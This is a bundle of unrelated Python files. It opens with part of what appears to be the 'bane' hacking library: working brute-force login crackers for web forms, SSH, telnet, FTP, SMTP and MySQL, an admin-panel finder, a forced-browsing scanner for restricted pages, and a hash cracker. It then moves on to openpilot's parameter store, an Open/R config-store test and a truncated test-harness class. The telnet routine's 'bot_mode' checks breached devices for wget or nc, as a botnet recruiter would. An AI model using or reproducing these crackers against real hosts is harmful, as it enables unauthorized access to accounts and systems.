r=requests.post(form[1],data=d,headers=h,verify=False,proxies=proxy, timeout=timeout)
except:
return False
try:
set_login_form(url, r.text.encode('utf-8','ignore'), username, password)
return False
except:
return True
def __init__(self,u,word_list=[],threads_daemon=True,logs=True,proxy=None,proxies=None,cookie=None,user_agent=None,timeout=10):
self.stop=False
self.finish=False
self.logs=logs
self.result={}
t=threading.Thread(target=self.crack,args=(u,word_list,logs,proxy,proxies,cookie,user_agent,timeout,))
t.daemon=threads_daemon
t.start()
def done(self):
return self.finish
def crack(self,u,word_list,logs,proxy,proxies,cookie,user_agent,timeout):
for x in word_list:
try:
if self.stop==True:
self.finish=True
break
username=x.split(":")[0]
password=x.split(":")[1]
if self.logs==True:
print("[*]Trying: {} {}".format(username,password))
if user_agent:
us=user_agent
else:
us=random.choice(ua)
prox=None
if proxy:
prox=proxy
if proxies:
prox=random.choice(proxies)
if self.try_combo(u,username,password,cookie,us,prox,timeout)==True:
if self.logs==True:
print("[+]Success")
self.result={u:username+":"+password}
self.finish=True
break
else:
if self.logs==True:
print("[-]Fail")
except Exception as e:
pass
if self.logs==True:
print("[-]Fail")
self.finish=True
class filemanager_finder:
__slots__=["logs","stop","finish","result"]
def __init__(self,u,logs=True,threads_daemon=True,user_agent=None,cookie=None,timeout=10,proxy=None,proxies=None):
'''
u: the link: http://www.example.com
logs: (set by default to True) the show the process and requests
mapping: (set by default to: False) if it is set to True, it will stop the prcess when it finds the link, else: it continue for more
possible links
returning: (set by default to: False) if you want it to return a list of possibly accesseble links to be used in your scripts set it to: True
timeout: (set by default to 10) timeout flag for the requests
usage:
>>>import bane
>>>url='http://www.example.com/'
>>>bane.filemanager_finder(url)
'''
self.logs=logs
self.stop=False
self.finish=False
self.result={}
t=threading.Thread(target=self.crack,args=(u,logs,user_agent,cookie,timeout,proxy,proxies,))
t.daemon=threads_daemon
t.start()
def crack(self,u,logs,user_agent,cookie,timeout,proxy,proxies):
for i in manager:
if self.stop==True:
self.finish=True
break
if proxy:
proxy={'http':'http://'+proxy,'https':'http://'+proxy}
if proxies:
prx=random.choice(proxies)
proxy={'http':'http://'+prx,'https':'http://'+prx}
if user_agent:
us=user_agent
else:
us=random.choice(ua)
hed={'User-Agent': us}
if cookie:
hed.update({"Cookie":cookie})
try:
if u[len(u)-1]=='/':
u=u[0:len(u)-1]
g=u+i
r=requests.get(g, headers = hed , allow_redirects=False,proxies=proxy,timeout=timeout, verify=False)
if r.status_code == requests.codes.ok:
if ("Uncaught exception" not in r.text) and ("404 Not Found" not in r.text) and ('could not be found' not in r.text):
self.finish=True
if self.logs==True:
sys.stdout.write("\rStats: {}/{} | Found: {} ".format(manager.index(g),len(manager),self.finish))
sys.stdout.flush()
self.result.update({u:g})
break
else:
if self.logs==True:
sys.stdout.write("\rStats: {}/{} | Found: {} ".format(manager.index(g),len(manager),self.finish))
sys.stdout.flush()
else:
if self.logs==True:
sys.stdout.write("\rStats: {}/{} | Found: {} ".format(manager.index(g),len(manager),self.finish))
sys.stdout.flush()
except KeyboardInterrupt:
break
except Exception as e:
pass
self.finish=True
def done(self):
return self.finish
class force_browsing:
__slots__=["stop","finish","result","logs"]
def __init__(self,u,timeout=10,threads_daemon=True,logs=True,ext='php',user_agent=None,cookie=None,proxy=None,proxies=None):
'''
this function is using "Forced Browsing" technique which is aim to access restricted areas without providing any credentials!!!
it is used here to gain access to admin control panel by trying different possible combinations of links with the given URL.
it's possible to do that and this a proof of concept that unserured cpanels with lack of right sessions configurations can be
accessed just by guessing the right links :)
the function takes those arguments:
u: the targeted link which should be leading to the control panel, example:
http://www.example.com/admin/login.php
you have to delete 'login.php' and insert the rest of the link in the function like this:
>>>import bane
>>>bane.force_browsing('http://www.example.com/admin/')
then the function will try to find possible accesseble links:
http://www.example.com/admin/edit.php
http://www.example.com/admin/news.php
http://www.example.com/admin/home.php
timeout: (set by default to 10) timeout flag for the request
logs: (set by default to: True) showing the process of the attack, you can turn it off by setting it to: False
returning: (set by default to: False) return a list of the accessible link(s), to make the function return the list, set to: True
mapping: (set by default to: True) find all possible links, to make stop if it has found 1 link just set it to: False
ext: (set by default to: "php") it helps you to find links with the given extention, cuurentky it supports only 3 extentions: "php", "asp" and "aspx"( any other extention won't be used).
'''
self.stop=False
self.finish=False
self.result={}
self.logs=logs
t=threading.Thread(target=self.crack,args=(u,timeout,logs,ext,user_agent,cookie,proxy,proxies,))
t.daemon=threads_daemon
t.start()
def crack(self,u,timeout=10,logs=True,ext='php',user_agent=None,cookie=None,proxy=None,proxies=None):
l=[]
if u[len(u)-1]=='/':
u=u[0:len(u)-1]
for x in innerl:
if self.stop==True:
break
g=u+x+'.'+ext
if self.logs==True:
print("[*]Trying:",g)
try:
if proxy:
proxy=proxy
if proxies:
proxyrandom.choice(proxies)
if user_agent:
us=user_agent
else:
us=random.choice(ua)
h=access(g,user_agent=us,cookie=cookie,proxy=proxy)
except KeyboardInterrupt:
break
if h==True:
l.append(g)
if self.logs==True:
print("[+]FOUND!!!")
else:
if self.logs==True:
print("[-]Failed")
self.result={u:l}
self.finish=True
def done(self):
return self.finish
class admin_panel_finder:
__slots__=["stop","finish","result","logs"]
def done(self):
return self.finish
'''
this function use a list of possible admin panel links with different extensions: php, asp, aspx, js, /, cfm, cgi, brf and html.
ext: (set by default to: 'php') to define the link's extention.
usage:
>>>import bane
>>>bane.admin_panel_finder('http://www.example.com',ext='php',timeout=7)
>>>bane.admin_panel_finder('http://www.example.com',ext='aspx',timeout=5)
'''
def __init__(self,u,logs=True,threads_daemon=True,user_agent=None,cookie=None,ext='php',timeout=10,proxy=None,proxies=None):
self.logs=logs
self.stop=False
self.finish=False
self.result={}
t=threading.Thread(target=self.crack,args=(u,timeout,logs,ext,user_agent,cookie,proxy,proxies,))
t.daemon=threads_daemon
t.start()
def crack(self,u,timeout=10,logs=True,ext='php',user_agent=None,cookie=None,proxy=None,proxies=None):
links=[]
ext=ext.strip()
if ext.lower()=="php":
links=phpl
elif ext.lower()=="asp":
links=aspl
elif ext.lower()=="aspx":
links=aspxl
elif ext.lower()=="js":
links=jsl
elif ext=="/":
links=slashl
elif ext.lower()=="cfm":
links=cfml
elif ext.lower()=="cgi":
links=cgil
elif ext.lower()=="brf":
links=brfl
elif ext.lower()=="html":
links=htmll
k=[]
for i in links:
if self.stop==True:
break
try:
if proxy:
proxy={'http':'http://'+proxy,'https':'http://'+proxy}
if proxies:
prx=random.choice(proxies)
proxy={'http':'http://'+prx,'https':'http://'+prx}
if user_agent:
us=user_agent
else:
us=random.choice(ua)
hed={'User-Agent': us}
if cookie:
hed.update({"Cookie":cookie})
if u[len(u)-1]=='/':
u=u[0:len(u)-1]
g=u+i
if self.logs==True:
print("[*]Trying:",g)
r=requests.get(g,headers = hed,allow_redirects=False,proxies=proxy,timeout=timeout, verify=False)
if r.status_code == requests.codes.ok:
if self.logs==True:
print("[+]FOUND!!!")
k.append(g)
else:
if self.logs==True:
print("[-]failed")
except KeyboardInterrupt:
break
except Exception as e:
if self.logs==True:
print ("[-]Failed")
self.result={u:k}
self.finish=True
'''
the next functions are used to check the login credentials you provide, it can be used for bruteforce attacks.
it returns True if the given logins, else it returns False.
example:
>>>host='125.33.32.11'
>>>wordlist=['admin:admin','admin123:admin','user:password']
>>>for x in wordlist:
user=x.split(':')[0]
pwd=x.split(':')[1]
print '[*]Trying:',user,pwd
if bane.telnet(host,username=user,password=pwd)==True:
print'[+]Found!!!'
else:
print'[-]Failed'
'''
def smtp(u, username,password,p=25,ehlo=True,helo=False,ttls=False):
try:
s= smtplib.SMTP(u, p)#connect to smtp server
if ehlo==True:
s.ehlo()#ehlo
if ttls==True:
s.starttls()#ttls
if helo==True:
s.helo()#helo
if ttls==True:
s.starttls()
s.login(username, password)
return True
except Exception as e:
pass
return False
def telnet(u,username,password,p=23,timeout=5,bot_mode=False):
try:
t=xtelnet.session()
t.connect(u,username=username,password=password,p=p,timeout=timeout)
if bot_mode==True:
a=t.execute('busybox')
t.destroy()
if bot_mode==True:
if "wget" in a or "nc" in a:
return True
return False
return True
except:
pass
return False
#why i used this code for ssh brute force instead of: pexpext/paramiko ? Well pexpect doesn't work on non-linux machines and paramiko gives a huuuuge number of false positive results ! you will see, with this code there is no false positive brute force ;)
def ssh(u,username,password,p=22,timeout=5,exchange_key=None):
if os.name == 'nt':
if exchange_key!=None:#this doesn't work on windows for some reason :(
return False
l='echo y | plink -ssh -l {} -pw {} {} -P {} "hvbjkjk"'.format(username,password,u,p)
sshp = subprocess.Popen(l.split(),stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE,shell=True)
else:
if exchange_key:
key="-oHostKeyAlgorithms=+"+exchange_key
else:
key=""
l="sshpass -p {} ssh {} -p {} -o StrictHostKeyChecking=no -l {} {} 'exithg'".format(password,key,p,username,u) #we use the sshpass command to send the password
sshp = subprocess.Popen(l.split(),stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
ti=time.time()
while sshp.poll() is None:
time.sleep(.1)
#print(ssh.stdout.readlines())
if int(time.time()-ti)==timeout:
try:
sshp.kill()
except:
pass
return False
ou=sshp.communicate()
try:
sshp.kill()
except:
pass
time.sleep(0.1)
if exchange_key==None:
if "Their offer:" in ou[1].decode("utf-8") :
if os.name == 'nt':
return False
k=ou[1].decode("utf-8").split("offer:")[1].strip()
return ssh(u,username,password,p=p,timeout=timeout,exchange_key=k)
if "Server refused to start a shell/command" in ou[1].decode("utf-8"):
return True
if (( "unsupported" in ou[1].decode("utf-8").lower() )or( "denied" in ou[1].decode("utf-8").lower() )or("FATAL ERROR" in ou[1].decode("utf-8")) or ("refused" in ou[1].decode("utf-8").lower()) or ("Unsupported KEX algorithm" in ou[1].decode("utf-8")) or ("Bad SSH2 KexAlgorithms" in ou[1].decode("utf-8")) ):
return False
else:
return True
def ftp_anon(ip,timeout=5):
#anonymous ftp login
try:
ftp = FTP(ip,timeout=timeout)
ftp.login()
return True
except Exception as e:
pass
return False
def ftp(ip,username,password,timeout=5):
try:
i=False
ftp = FTP(ip,timeout=timeout)
ftp.login(username,password)
return True
except Exception as e:
pass
return False
def mysql(u,username,password,timeout=5,p=3306):
try:
s=mysqlcp.session(u,username,password,timeout=timeout,port=p)
s.destroy()
return True
except Exception as e:
pass
return False
class hydra:
__slots__=["stop","finish","result","logs"]
def __init__(self,u,p=22,protocol="ssh",word_list=[],threads_daemon=True,logs=True,exchange_key=None,timeout=5,ehlo=False,helo=True,ttls=False,proxy=None,proxies=None):
'''
this function is similar to hydra tool to bruteforce attacks on different ports.
protocol: (set by default to: ssh) set the chosen protocol (ftp, ssh, telnet, smtp and mysql) and don't forget to set the port.
'''
self.logs=logs
self.stop=False
self.finish=False
self.result={}
t=threading.Thread(target=self.crack,args=(u,p,protocol,word_list,logs,exchange_key,timeout,ehlo,helo,ttls,proxy,proxies,))
t.daemon=threads_daemon
t.start()
def crack(self,u,p,protocol,word_list,logs,exchange_key,timeout,ehlo,helo,ttls,proxy,proxies):
o=''
if protocol=="telnet":
s=telnet
if protocol=="ssh":
s=ssh
if protocol=="ftp":
s=ftp
if protocol=="smtp":
s=smtp
if protocol=="mysql":
s=mysql
if protocol=="wp":
s=wpadmin
for x in word_list:
if self.stop==True:
break
user=x.split(':')[0].strip()
pwd=x.split(':')[1].strip()
if self.logs==True:
print("[*]Trying ==> {}:{}".format(user,pwd))
if protocol=="ssh":
r=s(u,user,pwd,timeout=timeout,p=p,exchange_key=exchange_key)
elif protocol=="telnet":
r=s(u,user,pwd,timeout=timeout,p=p)
elif (protocol=="mysql"):
r=s(u,user,pwd,timeout=timeout,p=p)
elif (protocol=="ftp"):
r=s(u,user,pwd,timeout=timeout)
elif (protocol=="wp"):
if proxy:
proxy=proxy
if proxies:
proxy=random.choice(proxies)
r=s(u,user,pwd,proxy=proxy,user_agent=user_agent,cookie=cookie,timeout=timeout)
elif (protocol=="smtp"):
r=s(u,p,user,pwd,ehlo=ehlo,helo=helo,ttls=ttls)
else:
r=s(u,user,pwd,timeout=timeout)
if r==True:
if self.logs==True:
print("[+]Found!!!")
o="{}:{}".format(user,pwd)
break
else:
if self.logs==True:
print("[-]Failed")
self.result={u:o}
self.finish=True
class decrypt:
__slots__=["stop","finish","result","logs"]
def __init__(self,u,word_list=[],threads_daemon=True,md5_hash=False,sha1_hash=False,sha256_hash=False,sha224_hash=False,sha384_hash=False,sha512_hash=False,base64_string=False,caesar_hash=False,logs=False):
self.logs=logs
self.stop=False
self.finish=False
self.result={}
t=threading.Thread(target=self.crack,args=(u,word_list,md5_hash,sha1_hash,sha256_hash,sha224_hash,sha384_hash,sha512_hash,base64_string,caesar_hash,logs,))
t.daemon=threads_daemon
t.start()
def crack(self,u,word_list,md5_hash,sha1_hash,sha256_hash,sha224_hash,sha384_hash,sha512_hash,base64_string,caesar_hash,logs):
if self.logs==True:
print('[!]hash: '+u+'\nbruteforcing has started!!!\n')
for x in word_list:
if self.stop==True:
break
if md5_hash==True:
if dmd5(x,u)==True:
if self.logs==True:
print("[+]Hash match found: "+x+" | Type: md5")
self.result={u:["md5:"+x]}
break
if sha1_hash==True:
if dsha1(x,u)==True:
if self.logs==True:
print("[+]Hash match found: "+x+" | Type: sha1")
self.result={u:["sha1:"+x]}
break
if sha256_hash==True:
if dsha256(x,u)==True:
if self.logs==True:
print("[+]Hash match found: "+x+" | Type: sha256")
self.result={u:["sha256:"+x]}
break
if sha224_hash==True:
if dsha224(x,u)==True:
if self.logs==True:
print("[+]Hash match found: "+x+" | Type: sha224")
self.result={u:["sha224:"+x]}
break
if sha384_hash==True:
if dsha384(x,u)==True:
if self.logs==True:
print("[+]Hash match found: "+x+" | Type: sha384")
self.result={u:["sha384:"+x]}
break
if sha512_hash==True:
if dsha512(x,u)==True:
if self.logs==True:
print("[+]Hash match found: "+x+" | Type: sha512")
self.result={u:["sha512:"+x]}
break
if base64_string==True:
if base64_decode(x)==u:
if self.logs==True:
print("[+]Hash match found: "+x+" | Type: base64")
self.result={u:["base64:"+x]}
break
if caesar_hash==True:
for i in range(1,27):
if dcaesar(x,i)==True:
if self.logs==True:
print("[+]Hash match found: "+x+" | Type: caesar | Key: "+str(i))
self.result={u:["caesar"+str(i)+":"+x]}
break
if self.result=={}:
if self.logs==True:
print('[-]No match found')
self.finish=True
def done(self):
return self.finish
def process_threaded(a,check_interval=0.1):
while True:
try:
if a.done()==True:
try:
return a.result
except:
pass
try:
return a.counter
except:
return
time.sleep(check_interval)
except KeyboardInterrupt:
a.stop=True
try:
return a.result
except:
pass
try:
return a.counter
except:
pass |
params.py | #!/usr/bin/env python3
"""ROS has a parameter server, we have files.
The parameter store is a persistent key value store, implemented as a directory with a writer lock.
On Android, we store params under params_dir = /data/params. The writer lock is a file
"<params_dir>/.lock" taken using flock(), and data is stored in a directory symlinked to by
"<params_dir>/d".
Each key, value pair is stored as a file with named <key> with contents <value>, located in
<params_dir>/d/<key>
Readers of a single key can just open("<params_dir>/d/<key>") and read the file contents.
Readers who want a consistent snapshot of multiple keys should take the lock.
Writers should take the lock before modifying anything. Writers should also leave the DB in a
consistent state after a crash. The implementation below does this by copying all params to a temp
directory <params_dir>/<tmp>, then atomically symlinking <params_dir>/<d> to <params_dir>/<tmp>
before deleting the old <params_dir>/<d> directory.
Writers that only modify a single key can simply take the lock, then swap the corresponding value
file in place without messing with <params_dir>/d.
"""
import time
import os
import errno
import shutil
import fcntl
import tempfile
import threading
from enum import Enum
from common.basedir import PARAMS
def mkdirs_exists_ok(path):
try:
os.makedirs(path)
except OSError:
if not os.path.isdir(path):
raise
class TxType(Enum):
PERSISTENT = 1
CLEAR_ON_MANAGER_START = 2
CLEAR_ON_PANDA_DISCONNECT = 3
class UnknownKeyName(Exception):
pass
keys = {
"AccessToken": [TxType.CLEAR_ON_MANAGER_START],
"AthenadPid": [TxType.PERSISTENT],
"CalibrationParams": [TxType.PERSISTENT],
"CarParams": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CarParamsCache": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CarVin": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CommunityFeaturesToggle": [TxType.PERSISTENT],
"CompletedTrainingVersion": [TxType.PERSISTENT],
"ControlsParams": [TxType.PERSISTENT],
"DisablePowerDown": [TxType.PERSISTENT],
"DisableUpdates": [TxType.PERSISTENT],
"DoUninstall": [TxType.CLEAR_ON_MANAGER_START],
"DongleId": [TxType.PERSISTENT],
"GitBranch": [TxType.PERSISTENT],
"GitCommit": [TxType.PERSISTENT],
"GitRemote": [TxType.PERSISTENT],
"GithubSshKeys": [TxType.PERSISTENT],
"HasAcceptedTerms": [TxType.PERSISTENT],
"HasCompletedSetup": [TxType.PERSISTENT],
"IsDriverViewEnabled": [TxType.CLEAR_ON_MANAGER_START],
"IsLdwEnabled": [TxType.PERSISTENT],
"IsGeofenceEnabled": [TxType.PERSISTENT],
"IsMetric": [TxType.PERSISTENT],
"IsOffroad": [TxType.CLEAR_ON_MANAGER_START],
"IsRHD": [TxType.PERSISTENT],
"IsTakingSnapshot": [TxType.CLEAR_ON_MANAGER_START],
"IsUpdateAvailable": [TxType.CLEAR_ON_MANAGER_START],
"IsUploadRawEnabled": [TxType.PERSISTENT],
"LastAthenaPingTime": [TxType.PERSISTENT],
"LastUpdateTime": [TxType.PERSISTENT],
"LimitSetSpeed": [TxType.PERSISTENT],
"LimitSetSpeedNeural": [TxType.PERSISTENT],
"LiveParameters": [TxType.PERSISTENT],
"LongitudinalControl": [TxType.PERSISTENT],
"OpenpilotEnabledToggle": [TxType.PERSISTENT],
"LaneChangeEnabled": [TxType.PERSISTENT],
"PandaFirmware": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"PandaFirmwareHex": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"PandaDongleId": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Passive": [TxType.PERSISTENT],
"RecordFront": [TxType.PERSISTENT],
"ReleaseNotes": [TxType.PERSISTENT],
"ShouldDoUpdate": [TxType.CLEAR_ON_MANAGER_START],
"SpeedLimitOffset": [TxType.PERSISTENT],
"SubscriberInfo": [TxType.PERSISTENT],
"TermsVersion": [TxType.PERSISTENT],
"TrainingVersion": [TxType.PERSISTENT],
"UpdateAvailable": [TxType.CLEAR_ON_MANAGER_START],
"UpdateFailedCount": [TxType.CLEAR_ON_MANAGER_START],
"Version": [TxType.PERSISTENT],
"Offroad_ChargeDisabled": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Offroad_ConnectivityNeeded": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_ConnectivityNeededPrompt": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_TemperatureTooHigh": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_PandaFirmwareMismatch": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Offroad_InvalidTime": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_IsTakingSnapshot": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_NeosUpdate": [TxType.CLEAR_ON_MANAGER_START],
}
def fsync_dir(path):
fd = os.open(path, os.O_RDONLY)
try:
os.fsync(fd)
finally:
os.close(fd)
class FileLock():
def __init__(self, path, create):
self._path = path
self._create = create
self._fd = None
def acquire(self):
self._fd = os.open(self._path, os.O_CREAT if self._create else 0)
fcntl.flock(self._fd, fcntl.LOCK_EX)
def release(self):
if self._fd is not None:
os.close(self._fd)
self._fd = None
class DBAccessor():
def __init__(self, path):
self._path = path
self._vals = None
def keys(self):
self._check_entered()
return self._vals.keys()
def get(self, key):
self._check_entered()
if self._vals is None:
return None
try:
return self._vals[key]
except KeyError:
return None
def _get_lock(self, create):
lock = FileLock(os.path.join(self._path, ".lock"), create)
lock.acquire()
return lock
def _read_values_locked(self):
"""Callers should hold a lock while calling this method."""
vals = {}
try:
data_path = self._data_path()
keys = os.listdir(data_path)
for key in keys:
with open(os.path.join(data_path, key), "rb") as f:
vals[key] = f.read()
except (OSError, IOError) as e:
# Either the DB hasn't been created yet, or somebody wrote a bug and left the DB in an
# inconsistent state. Either way, return empty.
if e.errno == errno.ENOENT:
return {}
return vals
def _data_path(self):
return os.path.join(self._path, "d")
def _check_entered(self):
if self._vals is None:
raise Exception("Must call __enter__ before using DB")
class DBReader(DBAccessor):
def __enter__(self):
try:
lock = self._get_lock(False)
except OSError as e:
# Do not create lock if it does not exist.
if e.errno == errno.ENOENT:
self._vals = {}
return self
try:
# Read everything.
self._vals = self._read_values_locked()
return self
finally:
lock.release()
def __exit__(self, exc_type, exc_value, traceback):
pass
class DBWriter(DBAccessor):
def __init__(self, path):
super(DBWriter, self).__init__(path)
self._lock = None
self._prev_umask = None
def put(self, key, value):
self._vals[key] = value
def delete(self, key):
self._vals.pop(key, None)
def __enter__(self):
mkdirs_exists_ok(self._path)
# Make sure we can write and that permissions are correct.
self._prev_umask = os.umask(0)
try:
os.chmod(self._path, 0o777)
self._lock = self._get_lock(True)
self._vals = self._read_values_locked()
except Exception:
os.umask(self._prev_umask)
self._prev_umask = None
raise
return self
def __exit__(self, exc_type, exc_value, traceback):
self._check_entered()
try:
# data_path refers to the externally used path to the params. It is a symlink.
# old_data_path is the path currently pointed to by data_path.
# tempdir_path is a path where the new params will go, which the new data path will point to.
# new_data_path is a temporary symlink that will atomically overwrite data_path.
#
# The current situation is:
# data_path -> old_data_path
# We're going to write params data to tempdir_path
# tempdir_path -> params data
# Then point new_data_path to tempdir_path
# new_data_path -> tempdir_path
# Then atomically overwrite data_path with new_data_path
# data_path -> tempdir_path
old_data_path = None
new_data_path = None
tempdir_path = tempfile.mkdtemp(prefix=".tmp", dir=self._path)
try:
# Write back all keys.
os.chmod(tempdir_path, 0o777)
for k, v in self._vals.items():
with open(os.path.join(tempdir_path, k), "wb") as f:
f.write(v)
f.flush()
os.fsync(f.fileno())
fsync_dir(tempdir_path)
data_path = self._data_path()
try:
old_data_path = os.path.join(self._path, os.readlink(data_path))
except (OSError, IOError):
# NOTE(mgraczyk): If other DB implementations have bugs, this could cause
# copies to be left behind, but we still want to overwrite.
pass
new_data_path = "{}.link".format(tempdir_path)
os.symlink(os.path.basename(tempdir_path), new_data_path)
os.rename(new_data_path, data_path)
fsync_dir(self._path)
finally:
# If the rename worked, we can delete the old data. Otherwise delete the new one.
success = new_data_path is not None and os.path.exists(data_path) and (
os.readlink(data_path) == os.path.basename(tempdir_path))
if success:
if old_data_path is not None:
shutil.rmtree(old_data_path)
else:
shutil.rmtree(tempdir_path)
# Regardless of what happened above, there should be no link at new_data_path.
if new_data_path is not None and os.path.islink(new_data_path):
os.remove(new_data_path)
finally:
os.umask(self._prev_umask)
self._prev_umask = None
# Always release the lock.
self._lock.release()
self._lock = None
def read_db(params_path, key):
path = "%s/d/%s" % (params_path, key)
try:
with open(path, "rb") as f:
return f.read()
except IOError:
return None
def write_db(params_path, key, value):
if isinstance(value, str):
value = value.encode('utf8')
prev_umask = os.umask(0)
lock = FileLock(params_path + "/.lock", True)
lock.acquire()
try:
tmp_path = tempfile.mktemp(prefix=".tmp", dir=params_path)
with open(tmp_path, "wb") as f:
f.write(value)
f.flush()
os.fsync(f.fileno())
path = "%s/d/%s" % (params_path, key)
os.rename(tmp_path, path)
fsync_dir(os.path.dirname(path))
finally:
os.umask(prev_umask)
lock.release()
class Params():
def __init__(self, db=PARAMS):
self.db = db
# create the database if it doesn't exist...
if not os.path.exists(self.db + "/d"):
with self.transaction(write=True):
pass
def clear_all(self):
shutil.rmtree(self.db, ignore_errors=True)
with self.transaction(write=True):
pass
def transaction(self, write=False):
if write:
return DBWriter(self.db)
else:
return DBReader(self.db)
def _clear_keys_with_type(self, tx_type):
with self.transaction(write=True) as txn:
for key in keys:
if tx_type in keys[key]:
txn.delete(key)
def manager_start(self):
self._clear_keys_with_type(TxType.CLEAR_ON_MANAGER_START)
def panda_disconnect(self):
self._clear_keys_with_type(TxType.CLEAR_ON_PANDA_DISCONNECT)
def delete(self, key):
with self.transaction(write=True) as txn:
txn.delete(key)
def get(self, key, block=False, encoding=None):
if key not in keys:
raise UnknownKeyName(key)
while 1:
ret = read_db(self.db, key)
if not block or ret is not None:
break
# is polling really the best we can do?
time.sleep(0.05)
if ret is not None and encoding is not None:
ret = ret.decode(encoding)
return ret
def put(self, key, dat):
"""
Warning: This function blocks until the param is written to disk!
In very rare cases this can take over a second, and your code will hang.
Use the put_nonblocking helper function in time sensitive code, but
in general try to avoid writing params as much as possible.
"""
if key not in keys:
raise UnknownKeyName(key)
write_db(self.db, key, dat)
def put_nonblocking(key, val):
def f(key, val):
params = Params()
params.put(key, val)
t = threading.Thread(target=f, args=(key, val))
t.start()
return t
|
config_store_client_tests.py | #!/usr/bin/env python
#
# Copyright (c) 2014-present, Facebook, Inc.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
#
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
from openr.utils import socket
from openr.utils.serializer import serialize_thrift_object
from openr.clients import config_store_client
from openr.PersistentStore import ttypes as ps_types
from openr.LinkMonitor import ttypes as lm_types
import zmq
import unittest
from multiprocessing import Process
store_db = {'key1': serialize_thrift_object(lm_types.DumpLinksReply(
thisNodeName='node1')),
'key2': serialize_thrift_object(lm_types.DumpLinksReply(
thisNodeName='node2'))}
class ConfigStore():
def __init__(self, zmq_ctx, url):
self._cs_server_socket = socket.Socket(zmq_ctx, zmq.REP)
self._cs_server_socket.bind(url)
self._store_db = store_db
def process_request(self):
req = self._cs_server_socket.recv_thrift_obj(ps_types.StoreRequest)
if req.requestType == ps_types.StoreRequestType.LOAD:
if req.key in self._store_db:
resp = ps_types.StoreResponse(success=1, key=req.key,
data=self._store_db[req.key])
else:
resp = ps_types.StoreResponse(success=0, key=req.key)
if req.requestType == ps_types.StoreRequestType.ERASE:
if req.key in self._store_db:
resp = ps_types.StoreResponse(success=1, key=req.key)
del store_db[req.key]
else:
resp = ps_types.StoreResponse(success=0, key=req.key)
if req.requestType == ps_types.StoreRequestType.STORE:
store_db[req.key] = req.data
resp = ps_types.StoreResponse(success=1, key=req.key)
self._cs_server_socket.send_thrift_obj(resp)
class TestConfigStoreClient(unittest.TestCase):
def test(self):
num_req = 6
ctx = zmq.Context()
def _cs_server():
cs_server = ConfigStore(ctx, "inproc://openr_config_store_cmd")
for _ in range(num_req):
cs_server.process_request()
def _cs_client():
cs_client_inst = config_store_client.ConfigStoreClient(
ctx, "inproc://openr_config_store_cmd")
self.assertEqual(cs_client_inst.load('key1'), store_db['key1'])
with self.assertRaises(Exception):
cs_client_inst.load('key3')
self.assertTrue(cs_client_inst.erase('key1'))
with self.assertRaises(Exception):
cs_client_inst.load('key1')
value = serialize_thrift_object(lm_types.DumpLinksReply(
thisNodeName='node5'))
self.assertTrue(cs_client_inst.store('key5', value))
self.assertEqual(cs_client_inst.load('key5'), value)
p = Process(target=_cs_server)
p.start()
q = Process(target=_cs_client)
q.start()
p.join()
q.join()
|
Case.py | #! /usr/bin/env python3
# -*- coding: UTF-8 -*-
__author__ = 'Sean Yu'
__mail__ = 'try.dash.now@gmail.com'
import os,time,re
import sys
import traceback
libpath = os.path.sep.join([os.path.dirname(os.getcwd()),'lib'])
if libpath not in sys.path:
sys.path.insert(0,libpath)
libpath = os.path.sep.join([os.path.dirname(os.getcwd()),'product'])
if libpath not in sys.path:
sys.path.insert(0,libpath)
#from WebSession import WebSession
from common import DumpStack
import threading
reCtrl = re.compile("^\s*ctrl\s*:(.*)", re.I)
reAlt = re.compile("^\s*alt\s*:(.*)", re.I)
reCtrlAlt = re.compile("^\s*ctrlalt\s*:(.*)", re.I)
reRetry = re.compile("^\s*try\s+([0-9]+)\s*:(.*)", re.I)
reNoAction =re.compile("[\s]*NOACTION[\s]*:([\s\S]*)",re.IGNORECASE)
reNoWait =re.compile("[\s]*NOWAIT[\s]*:([\s\S]*)",re.IGNORECASE)
reNo = re.compile("^\s*NO\s*:(.*)", re.I)
reSegementIndex =re.compile ('\s*(SETUP|RUN|TEARDOWN)\s*.\s*([+-]*\d+)',re.I)
from common import csvstring2array,csvfile2array
if os.name!='nt':
import queue
else:
import Queue as queue
class Case(object):
LogDir=None# './'
Name=None# 'DefaultTestCaseName'
SUTs=None#{}
Session=None #{}
Steps=None#[[],[],[]]
logger=None
arg =None#[]
kwarg = None#{}
argvs=None#[]
kwargvs =None#[]
thInteraction =None
bCaseEnd=False
MoniterInterval =1 #second
ServerPort=50000
ServerHost =None#'localhost'
#CasePort=50001
#CaseHost ='localhost'
SocketResponse=None#''
Sock=None
Mode= None#'FULL'
breakpoint=None#[[],[],[]]
flagInteraction=False
cp=None#[0,1]
thWebclient =None
CaseFailed= True
DebugWhenFailed=False
qCommand=queue.Queue()
fRunning= False
RecordReplay=None#[]
IndexOfSutOutput =None
SUTNAME =None#[]
InitialDone=False
fActionInProgress=False
lockOutput = None
lockRR =None
ErrorMessage =None # to store the error message
def SaveCase2File(self):
import csv
MAX_LENGTH_OF_CELL =256
csvfile = '../case/manual/%s'%(self.Name+time.strftime("_%Y%m%d_%H%M%S", time.localtime()))
with open(csvfile, 'w') as f:
writer = csv.writer(f)
lastcol2write = 4
for row in self.RecordReplay:
maxlen= 0
row = row[:lastcol2write]
for item in row:
l = len(str(item))
if l> maxlen:
maxlen = l
if maxlen > MAX_LENGTH_OF_CELL:
index = 0
